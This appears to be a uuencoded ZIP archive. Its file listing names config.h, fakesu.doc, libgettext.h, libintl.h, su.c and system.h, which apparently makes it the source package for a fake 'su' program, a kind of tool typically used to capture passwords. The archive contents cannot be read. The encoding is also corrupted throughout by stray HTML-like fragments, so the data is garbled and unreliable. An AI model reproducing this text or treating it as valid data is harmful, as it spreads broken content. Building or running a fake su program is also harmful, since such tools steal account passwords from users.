MTM%1B0_1/QW[M:Z>-9[E<-VRA%46Z\'KNE)$*ORVV:T1VB=O5.MY+@+V[0Z@ M;.+Z]^4EO:LL#'K#^Q&6?[ZDG];#Y#S44XP#Y41#FWF/`SK4PD?902HT/:"* MFP@W?\Q]?.-HL-++0-H4$-A9;G(&[N"S$FHO`^4%]CW'E-]+I-I3=O:Q]V#, M2#L31KJ5*;;8Q:$=;<#<]6*3M*SQ:X"]%Q%N4*>LDEM(UUR7V:UB$2N`3M
M)5;P<=W68=IU7V`/0'3&HW-!O2%F!=_0#D=.@P-'Z[
M@QM4Y?_--F^QV@V\K=W/=;Y&EO=(*B^2]L:YN9)M%[12Z&;_"]7J`/%79=[^
MN4U7JD+`=0+U!]=A0FW"I![P?:)ZG]SN:%M"KXL6]2*3G1<,4SE7]N(C%VK[ M% )E#36,[,4B:0;G<6^/=6@7npu'6<2j)06 m="" 1i="">F9?;@=/M*MC&4B0GK(IJ'RJ*\\&:>2!.3R2AI(GZ8KA\E?TK9%4F$_
MH6>9I'BF=PV"^)HPK&%">L%4=4?$*PJ%V1`>L'!CB`\\K9:!7D#O`-Q@R5*%
M(4TE9:F<96'#`25][$WN[A\GU!X^T3IY:H#2!QJY\ECD?%2U"!;;0
M/A&Q60$%9]`==>Y`W[[J]7N3)U;[IC<9=l=cnkd?49l>VJ-)K_/8;X_HX7'T
M<#_N-HG&DA62SA?PFUG\`9,OC5!A"E.?X*T4*H4^!>)9PFN>5,]02)"'`'G=
M*0Y"+9Y;PT"YP:U%:D:Q-@U:)@H18#3MN<&Q$B/C20QU<\2NEXA!*H2`BDX%R*; MC@N9!&*1D@A3S7Q\.5.Q)+??N^H-)WWWCE.)CR=RQB)+^3"@$&5YVV/*BF72 M`J&W\,J;G*-/M0W/.OW^^\[&;7RAA9[KRM[*VY
M89O]]%&6)U$KA.^KO$(!DFBJ0S8F57->L$FVM,E5AJ)%EW&.9&QL^'"""73%=99>HB!#&\19BG_=Z``RBT==X[ITYH0YO[R"^&!U82/4)QYH?!'
MS#R0TNW!F.4QO_'DNN.Z>"HQRK=K(IDC=OD3>S)$]KU`4F//%$XHE"@E#1_[
M_5S.VJ,5`S@,-LO`;5L//DRUVK-6/IW4Z;R^KT=.<+'M;K-`7_]R!$QRV*;945^5;*? M?`V&*$9%HK"\PD@07^=Z*V/S7J/R84]DHF+K[2S1$2OP-Q6AD:^P&L^_K]2>
M7`WTH0SY[4;IW$7L.Y]PQ(,P0UX@$CKAC9;#M:<@BK-H*I.6\[GE5.*[TYX@ M'0KP)2?64L/:1(EI"*1$(M=!4/0[D1D=P3#D0+A"[Z6%/C7X-PV;J?19\;EM M#]PB;57\-XP]5;ZE\+[/M2^2(U=XQY3\!ZA__5>K)%2593>4\=P$K2V\;P!Q
M13/"N41X94&(\GDHK53Z6*/#B=!Z&OTV#?/J@7B(I?1M./2@',IQ7I\-NP&A
MD](2I7NU9T`Y9C#8>B]6V'
MV-@I;" jouul="" gnj="">A.+Z?M#N#8?M0?=_1F'7%/\56WQ$
MC(IC$V?@`(A>[NW]Z,GAN-E"+S_#X/<#)N!+A21 M[53XQO1)3Y97%
M%HY\6J7KWLC2HHH']F8FXC(ZBSZ:1QMA9!FAN$.[\K_%]L-1X:OD(##;
MW+\EZKX@P?;%[K!]A9%OV!_G6.87!7K7?(^A(:T.'^M!@_B>M\DS4$6K5D3+YP,$7SJBX@-N4KHC@D67RL5%9^@NS8,%K_N4Y7#=LH15%NO!
MZ[I21"K\MMFM$=HG;U3K>2X"]NT.H&SB^O?E);VK+`QZP_L1EG^^I)_6P^0\
MU%.,`^5$0YMYCP,ZU,)'V4$J-#V@BIL(-W_,?7SC:+#2RT#:%!#866YR!N[@
MLQ)J+P/E!?8]QY3?2Z3:4W;VL?=@S$@[$T:ZE2FVV,6A'6W`W/5BD[2L\6N`
MO1<1;e"gk));2-=9"@V2
MSN:1B(V[H"*&#CB=Z-.NM".,4SRGK256\''=UF':=5]@#T!TQJ-S0;TA9@7?
MT`Y'3H,#1^G-Y1[X]9+10;7Y;Y?WY2&B2JR#I%;Q7;U18H4?G4V7VQ>SK^^^
MNJT=R9_W=2[]R:>_!'2A]QX'^\4WNX,;5.7_S39OL=H-O*W=SW6^1I;W2"HO
MDO;&N;F2;1>T4NAF_PO5Z@#Q5V7>_KE-5ZI"P'4"]0?784)MPJ0>\'VB>I_< q="J^Q7#[EN*SYM+">?[]!U!+`P04````"``A
M?$4B.1&0DW`'``!6$@``!``0`'-U+F-56`P`WJ/X,H[\^#+\`0``A5AM;]LV
M$/Y<_xjkbs:2x[<`px`e\s`c29l,61sd9<.0!)xb4;86b=1(rjy7y+_ocj0l mr="8P(VVLX]W#X[T\1^5#PL.TB!AT0\'C9#%<="CL?2MF/2D">)&"Y_JHD63(M<>S
M7Z;7\[/+6^B.EB)CHT(Q.1IJ)K,1Z24Q6-7(NYC^=CZ_^^/N:O9E?N'#IT]M
M*W[S1*E8&!]8JAB,>O"^`0*]$>V`,.!$=P^GI^=W=YT/!6^3,AXE\8[)Y^GE
MU <[-I78&9E?[6[7PLJD%-)&U>YBE&^F]Q=W\XMZ
M)@.]M!FQ\!T$OE\RH(B#%O#"0DP`X(Y<8&h2!2ig81(g+!j""95+vmgyy^g#>X<0k&o6&0<[$j/\54b!3_91l7@ 9="B(8,,UH$" j="%_I_@)UA" g="5DA5I">^T:2#H!H7
M-85/]=/UX5B*`4K'=-*5;46,AHB.-QB0V//'1');/46R8K9P@N%E`RS6MH8
M"/15;N#F=_(.QI:>J+2W6-2/@LI>O5(E-;<;RI'30G:WN[TG$OS+9Y'S.2;\K)!*3CCAO98U(=>_;NSQ=``U+1@
M`EM:[-XXW&/H(BD!.>8U="=MVRWD
M<\Z"L6%LJ>@'>TSO)_`V.X4&Z(Q*Q'.ESYT[S$)?WY4,!A0D1^8,&="
M-BAM^(1%UGEG?*RSHCD9C>#&*#W@1M83YW39<`7S-03BV.,/Y:7+32<*$2-"REP!N"#X;9`$QG1 M/NC]4X?^`0SZ,$CQW\"R5O.3!:\6WLZEDMK,DS,/R9:XA\AG`#>*FN4>Y"=62"EWC;]\!9034
M1C,(%`EJ*Z!%#?6E52"3X"5ERH'D+5Z4'T4S$WMJD#EE13L:IR9W%^=75W5E
MZDHKI#L.T^'(*&)L<&JO%23:@M#'%EW+CN5T-8/:Z)3#KVY6@T(GJ1J0X.<%+X9!,LQP?+.H**W?J('0G[)5?=/=6/.= M+,#:,TV-S(YUY^XS^+!R_B#7-&>$U:[POS]3P4^886/E]>G4,/4T)#ID(D+ZTR
M$FK$4KO::?(+[DCG?1P_FZ7ZU-XZTYBZ5HKB]1+QP/,H0):7\=N<+A+@V7@2 M,-)?>!RG6:Z.D8#*:T;?AKWG(VGZR'K(GN>SSTVF5MC*X1(,/NI\Z[P+\>X*
MXV-BR1>\H;ZB&U:&5Q$CK<*.1KC[28MJ;%5W#GK4III:U;WSMRIGI&R_Y@=M M/BJ'YO+&SE'6*[OWJIA949.[?+AM\\%58#W4?DX&`SQ=\M&
MH>]'PZ/OJ]:RK3'V3UKV(%:P&SAO2,TIT/410_VCZ1UZHWR/]1EFN4G^ZM$N
M/^-V@ZZ_D]B6>-J5PT-K5C7NWDX6JM:`M=T.#Y]/_MMFO_O(%`ZAW),Z8^UN
M&&OL#?#*;;;7"UK?'?35G#<>X2B.!+(<\1K&5FF3@`82OK'E:QH0G@TGWOZ^ M,%V[1>$ERI[1]?H$=N]2E>4IDH"9T::;J?JW]RW<`ID7[W'F783:OWHMQ5N= M#?ICXV;Z[#9W9#*)1LN@.#$J/_&/ZMC581F&?NUT
MKO+B,!6*;>%(2`5@#WG&4H:O0CCW.-U3R]?*6(J,YMCK>^NU([D)56*@/?J5
M;SS/TJ$/]CW74\D_3,1>]?<3__`[ou_[>PH^=$?*#1#),K%BGH,V(G?$;L)W
M;]UX2#->_@502P,$%`````@`.WQ%(GX#O_0T"0``3Q<```@`$`!S>7-T96TN
M:%58#`#MH_@RPOSX,OP!``"-6']OVD@3_OO-IYCVI`(5$$B::_/F>I)#(/&5
M`#+0-M(K<<9>8%7C15X[*=)]^/>9M<$&`KVV4'8\OW=VYEF?OR>]UK%8UGRQ
M$J$OPIA\,9.AC*4*-<\E/A_PN:I2\_KZ=^I$0M!0S>(7-Q+444GHNVR@2G;HU<]8VV@A MM_H)/V1G":Q(!F3&_KG\'&I?#E;LQ[0H%U$%"\$
MQ2)::E(SL[COC>E>A")R`QHDTT!ZU)6>"+4@%Z:9@E!]FAH]+'',[1L2$L\C
M>A:1QIH0,YPHNS'[&9%:,5>%U;CAF@(WSGE?CS8/RB<9&n,+m4(`"^a$2"\r sw="@#E">*#P5SR)5)9>K0$(S
MPHC<,%XC(ZSAL>VT'B!BW=I=>_3$(73L4:\]'%*G[Y!%`\L9V:UQUW)H,'8&
M_6&[3C04[)9@!2D(^PS.7/%33
MKW?*I#10X=P$">8\C3<J:1@(I$C0(7$]0
MC88):[B\;%3I5NF8"_71HL9%L]FL-2\;'ZLT'EK(Q?OSL[/S]ZPF2'S!1^D\
M7J^$KB^P63,.WW@XDX'(N'^3&>\?S*QC-ZXO_F3R#,>.AB-K-'FT6DY_.+EU
M^E_:O;/?3#GCT<0>WG:_[*Q;#\[.^L[>77?L3G^'T.WM*G@]EM@0-]`ZI&'0_>W4<\V,IW'$528'B.R-36:'QOXDVEB;GJ3<,0$JO/``M-V+8!RPD#*?\0`E^N!!4/<-<&D$S8RB2-&<*8.;!@:#LC7CWP<>`^?^LD?^NX9SC-!YX9&CQ[&)R/OQ\XAZ<<\>CNXF#U"V;7=)B!'G<[,K2)BF,,%@L;]/OK:=H=WOG7D+-Z+W<9*0x7h?n4ab*fltf,05:b!]fg4@?:p@)_#*4o"omzm_m1z,[ns?iv-uv s="">DVH[SBE1.I8NM%+R^4V$IYGE/4QZ-;XC&
M^+T4RZ7"X$1D&D@#PPH`"#NF8QF:L49+%V,46"-P5V;$0<+CR<.7;O/MTNE`R<:DT>VA9<&W*Y&)[']F/?>3(\^9Y"MXK69D\IJ[G\(0.:
M<)YN.#;J\)'F9^G6LI.+J+!OQ4$IHBA41D^62T,X$S^!JD(HC5/"S7XI%N/8 MM>X'Q>)'2Q,CHV0UP^U!OU*\8U"HXK!-OD5TQJ%9[68B0M22:/3N?RO#<\QAW MSO$?`]H-=)W+9^8`X'=#+3>`FM&GJ@(`!JPD#0$G1&\PY93Q5J22^6(362!_
M"+*'`Q3XB&,GVR#?G1)G^)UVQ"HC1IA,8N6I<`:,JAFVRQF#9P/%&5$:N^9H MI39\<0[5)guu@c.lxl[6JY031&]J`@:98R`W1\6#?QPW^`2YR-F0I\/H=O
M30'<1dfhz,&54z!=u_>+==%)(FX2C-JK\"=9K414]BHD8J^>PG5LA\%^G"L$
MII,@YH[A@9NU8..T]%-7<,^8`TDWZ8_/>(ZOBZNK.O51$4@WBF$5I^E*L7IN
MC?68O*$>!">&KP2\SW]S19:JIDH,J,:_EXAO`ID'[-VGVE2:O.3E^^=G:EY\
MHI>%1"'BD"-WHT]-(>J
M4IC\&$BMT=.@/;GK/UIVC[>EN>T[QWDR(YS7O:8F]31PPQ\%:>!G"]`*4N4]
M3<1$n)g)\+)r8+p@se^`""7\y9bsu?_b4a&:i$[@xk9:%+7<.];@x;031n:(>JR'&WUF<;Q+_55"G)6MS=^/"WG!F&R/)0;/%B_ MDELMW'TY3">G>UH.TRH*]N6Z_6]MY[1ZU=Y24+O("_#@=5J
MGY8K[L=6SIS`TW*F@^S+?;^S[^U?./K3EW-YX*D1G'3[+:O["X<+XOPN()4D M%!(:/[_'4LL]=55N&NC+R"SZ+WI-C6QN*]'I,%V?JPJ3,0FY7YG70O$-
MOPHR@R94<65]]HPRSF*80!D(TEP9W-->_,C*5DR:_ZQ$\T24Q\A?E4
ME$7'E1[&++"`B]&=ZATH+7]2L]&XK%_4FM?7%Z31#LWKK_I5_:+>I)6+GG_5
MP-0-,>Z:5U>_U_#U*04+&P1A($:I4=J.JM)UR2`)DT>-&3TP,W.;R5CMY0\Q
M!T+K]&T?O)7+%08C#SNP,F+F`10H!"!*NO`ZDV?)W\9**7TWQG!D\RYKH=#1
M?06_.;<\_E6T9(4F[!0U[U5'VNPV&U`Q%5$SH6'>75<*-YS)(,76`Z<_zg,1>(OQE*ITWM\'FYD@/M_*8P;L8-LU2`:>:2V-Z*VB/4HF\OVJ^E+%`N852F@/[5ZEK".8.R5-];?*4
MSQIJ]ZQ;6(5?!;MO`<"E0<]O<^V3\@A3N<)#.L8/2I?;'I^^=8*8ST]]M<00>4[\U^5[F2$&H6C>PYFVE[3=*!E7W3/7?[>1/Q_4$L!`A4#%`````@`
M+R)$(G7:3PX=#```.3````@`#````````0``0*2!`````&-O;F9I9RYH55@(
M`).C^#*Z#/YN^Z.!```M`D```<`#``````` M`0``0*2!4PP``&5R3X("``#.!```"@`,```````!``!`I($6$0``9F%K97-U+F1O8U58"`!/
MJ?@R3ZGX,E!+`0(5`Q0````(`.-[12*[JQGC(@@``$X6```,``P```````$`
M`$"D@=`3``!L:6)G971T97AT+FA56`@`NZ/X,AG\^#)02P$"%0,4````"`#H
M>T4BNZL9XR((``!.%@``"0`,```````!``!`I($L'```;&EB:6YT;"YH55@(
M`,RC^#(C_/@R4$L!`A4#%`````@`(7Q%(CD1D)-P!P``5A(```0`#```````
M`0``0*2!A20``'-U+F-56`@`WJ/X,H[\^#)02P$"%0,4````"``[?$4B?@._
M]#0)``!/%P``"``,```````!``!`I($G+```<`!P#0`0``D34````` ` end